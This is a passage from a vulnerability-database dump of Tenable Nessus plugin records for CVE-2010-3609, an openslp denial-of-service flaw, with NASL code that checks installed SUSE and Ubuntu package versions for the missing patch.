"https://www.tenable.com/plugins/nessus/75689", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openslp-3310.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75689);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-3609\");\n\n script_name(english:\"openSUSE Security Update : openslp (openSUSE-SU-2010:0992-1)\");\n script_summary(english:\"Check for the openslp-3310 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"the openslp daemon could run into an endless loop when receiving\nspecially crafted packets (CVE-2010-3609).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=642571\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2010-11/msg00039.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openslp packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openslp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openslp-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openslp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openslp-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.3\", reference:\"openslp-1.2.0-180.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"openslp-devel-1.2.0-180.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"openslp-server-1.2.0-180.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", cpu:\"x86_64\", reference:\"openslp-32bit-1.2.0-180.1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openslp / openslp-32bit / openslp-devel / openslp-server\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-17T14:04:58", "description": "the openslp daemon could run into an endless loop when receiving\nspecially crafted packets (CVE-2010-3609).", "edition": 24, "published": "2011-05-05T00:00:00", "title": "openSUSE Security Update : openslp (openSUSE-SU-2010:0992-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3609"], "modified": "2011-05-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:openslp-devel", "cpe:/o:novell:opensuse:11.1", "p-cpe:/a:novell:opensuse:openslp-32bit", "p-cpe:/a:novell:opensuse:openslp-server", "p-cpe:/a:novell:opensuse:openslp"], "id": "SUSE_11_1_OPENSLP-101012.NASL", "href": "https://www.tenable.com/plugins/nessus/53685", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openslp-3310.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(53685);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-3609\");\n\n script_name(english:\"openSUSE Security Update : openslp (openSUSE-SU-2010:0992-1)\");\n script_summary(english:\"Check for the openslp-3310 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"the openslp daemon could run into an endless loop when receiving\nspecially crafted packets (CVE-2010-3609).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=642571\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2010-11/msg00039.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openslp packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openslp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openslp-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openslp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openslp-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/05/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"openslp-1.2.0-168.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"openslp-devel-1.2.0-168.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"openslp-server-1.2.0-168.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", cpu:\"x86_64\", reference:\"openslp-32bit-1.2.0-168.12.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openslp / openslp-32bit / openslp-devel / openslp-server\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-17T14:13:48", "description": "The openslp daemon could run into an endless loop when receiving\nspecially crafted packets. (CVE-2010-3609)\n\nAdditionally the following non-security bugs were fixed :\n\n - 564504: Fix handling of DA answers if both active and\n passive DA detection is off\n\n - 597215: Add configuration options to openSLP:\n net.slp.DASyncReg makes slpd query statically configured\n DAs for registrations, net.slp.isDABackup enables\n periodic writing of remote registrations to a backup\n file which is also read on startup. Both options can be\n used to decrease the time between the start of the slpd\n daemon and slpd knowing all registrations.\n\n - 601002: reduce CPU usage spikes on machines with many\n connections by using the kernel netlink interface\n instead of reading the /proc filesystem.\n\n - 626444: Standard compliance was fixed by stripping\n leading and trailing white spaces when doing string\n comparisons of scopes.", "edition": 23, "published": "2010-12-02T00:00:00", "title": "SuSE 11 Security Update : openslp (SAT Patch Number 3317)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3609"], "modified": "2010-12-02T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:openslp-32bit", "p-cpe:/a:novell:suse_linux:11:openslp", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:openslp-server"], "id": "SUSE_11_OPENSLP-101013.NASL", "href": "https://www.tenable.com/plugins/nessus/50954", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50954);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-3609\");\n\n script_name(english:\"SuSE 11 Security Update : openslp (SAT Patch Number 3317)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The openslp daemon could run into an endless loop when receiving\nspecially crafted packets. (CVE-2010-3609)\n\nAdditionally the following non-security bugs were fixed :\n\n - 564504: Fix handling of DA answers if both active and\n passive DA detection is off\n\n - 597215: Add configuration options to openSLP:\n net.slp.DASyncReg makes slpd query statically configured\n DAs for registrations, net.slp.isDABackup enables\n periodic writing of remote registrations to a backup\n file which is also read on startup. Both options can be\n used to decrease the time between the start of the slpd\n daemon and slpd knowing all registrations.\n\n - 601002: reduce CPU usage spikes on machines with many\n connections by using the kernel netlink interface\n instead of reading the /proc filesystem.\n\n - 626444: Standard compliance was fixed by stripping\n leading and trailing white spaces when doing string\n comparisons of scopes.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=564504\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=597215\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=601002\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=626444\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=642571\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3609.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 3317.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:openslp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:openslp-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:openslp-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/12/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (pl) audit(AUDIT_OS_NOT, \"SuSE 11.0\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"openslp-1.2.0-172.10.7.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"openslp-1.2.0-172.10.7.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"openslp-32bit-1.2.0-172.10.7.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"openslp-1.2.0-172.10.7.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"openslp-server-1.2.0-172.10.7.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"s390x\", reference:\"openslp-32bit-1.2.0-172.10.7.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"x86_64\", reference:\"openslp-32bit-1.2.0-172.10.7.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-17T14:06:24", "description": "the openslp daemon could run into an endless loop when receiving\nspecially crafted packets (CVE-2010-3609).", "edition": 24, "published": "2011-05-05T00:00:00", "title": "openSUSE Security Update : openslp (openSUSE-SU-2010:0992-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3609"], "modified": "2011-05-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:openslp-devel", "cpe:/o:novell:opensuse:11.2", "p-cpe:/a:novell:opensuse:openslp-32bit", "p-cpe:/a:novell:opensuse:openslp-server", "p-cpe:/a:novell:opensuse:openslp"], "id": "SUSE_11_2_OPENSLP-101012.NASL", "href": "https://www.tenable.com/plugins/nessus/53785", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openslp-3310.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(53785);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-3609\");\n\n script_name(english:\"openSUSE Security Update : openslp (openSUSE-SU-2010:0992-1)\");\n script_summary(english:\"Check for the openslp-3310 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"the openslp daemon could run into an endless loop when receiving\nspecially crafted packets (CVE-2010-3609).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=642571\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2010-11/msg00039.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openslp packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openslp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openslp-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openslp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openslp-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/05/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.2\", reference:\"openslp-1.2.0-174.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"openslp-devel-1.2.0-174.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"openslp-server-1.2.0-174.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", cpu:\"x86_64\", reference:\"openslp-32bit-1.2.0-174.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openslp / openslp-32bit / openslp-devel / openslp-server\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-17T14:46:49", "description": "The openslp daemon could run into an endless loop when receiving\nspecially crafted packets (CVE-2010-3609). This has been fixed.\n\nAdditionally the following non-security bugs were fixed :\n\n - This openSLP update extends the net.slp.isDABackup\n mechanism introduced with the previous update by a new\n configuration option 'DABackupLocalReg'.\n\n - This option tells the openslp server to also backup\n local registrations. (bnc#597215)\n\n - In addition, standard compliance was fixed by stripping\n leading and trailing white spaces when doing string\n comparisons of scopes.", "edition": 24, "published": "2010-11-30T00:00:00", "title": "SuSE 10 Security Update : openslp (ZYPP Patch Number 7187)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3609"], "modified": "2010-11-30T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_OPENSLP-7187.NASL", "href": "https://www.tenable.com/plugins/nessus/50842", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50842);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-3609\");\n\n script_name(english:\"SuSE 10 Security Update : openslp (ZYPP Patch Number 7187)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The openslp daemon could run into an endless loop when receiving\nspecially crafted packets (CVE-2010-3609). This has been fixed.\n\nAdditionally the following non-security bugs were fixed :\n\n - This openSLP update extends the net.slp.isDABackup\n mechanism introduced with the previous update by a new\n configuration option 'DABackupLocalReg'.\n\n - This option tells the openslp server to also backup\n local registrations. (bnc#597215)\n\n - In addition, standard compliance was fixed by stripping\n leading and trailing white spaces when doing string\n comparisons of scopes.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3609.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 7187.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"openslp-1.2.0-22.31.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"openslp-devel-1.2.0-22.31.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, cpu:\"x86_64\", reference:\"openslp-32bit-1.2.0-22.31.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"openslp-1.2.0-22.31.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"openslp-devel-1.2.0-22.31.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"openslp-server-1.2.0-22.31.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"x86_64\", reference:\"openslp-32bit-1.2.0-22.31.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-02-01T07:11:49", "description": "It was discovered that OpenSLP incorrectly handled certain corrupted\nmessages. A remote attacker could send a specially crafted packet to\nthe OpenSLP server and cause it to hang, leading to a denial of\nservice.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2011-06-13T00:00:00", "title": "Ubuntu 6.06 LTS / 8.04 LTS / 9.10 / 10.04 LTS / 10.10 : openslp, openslp-dfsg vulnerability (USN-1118-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3609"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libslp1", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts", "cpe:/o:canonical:ubuntu_linux:10.10", "cpe:/o:canonical:ubuntu_linux:9.10", "cpe:/o:canonical:ubuntu_linux:6.06:-:lts"], "id": "UBUNTU_USN-1118-1.NASL", "href": "https://www.tenable.com/plugins/nessus/55076", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1118-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(55076);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/09/19 12:54:27\");\n\n script_cve_id(\"CVE-2010-3609\");\n script_bugtraq_id(46772);\n script_xref(name:\"USN\", value:\"1118-1\");\n\n script_name(english:\"Ubuntu 6.06 LTS / 8.04 LTS / 9.10 / 10.04 LTS / 10.10 : openslp, openslp-dfsg vulnerability (USN-1118-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that OpenSLP incorrectly handled certain corrupted\nmessages. A remote attacker could send a specially crafted packet to\nthe OpenSLP server and cause it to hang, leading to a denial of\nservice.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1118-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libslp1 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libslp1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/03/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/06/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n 